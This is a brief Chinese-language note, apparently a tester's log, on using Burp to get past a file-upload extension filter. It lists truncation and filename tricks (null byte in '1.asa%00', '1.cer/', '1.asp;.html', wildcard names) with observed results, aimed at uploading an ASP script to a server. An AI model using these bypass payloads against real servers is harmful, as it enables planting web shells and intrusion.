burp截断后缀限制名突破
来源:14X
upFiles/Temp_Pic/1.asa%00 普通截断 ,错误bad失败
upFiles/Temp_Pic/1.cer/ CER截断成功,貌似访问就失误了
<script language='javascript' type='text/javascript'>retvalue('/upFiles/Temp_Pic/1.asp截断,访问找不到?
upFiles/Temp_Pic/1.cer/1.jpg/会不断的创建新目录,奇葩了。
upFiles/Temp_Pic/1.asp;.html也不行
/upFiles/Temp_Pic/*.asp 文件名、目录名或卷标语法不正确。
/upFiles/Temp_Pic/^*^.asp 文件名 无提示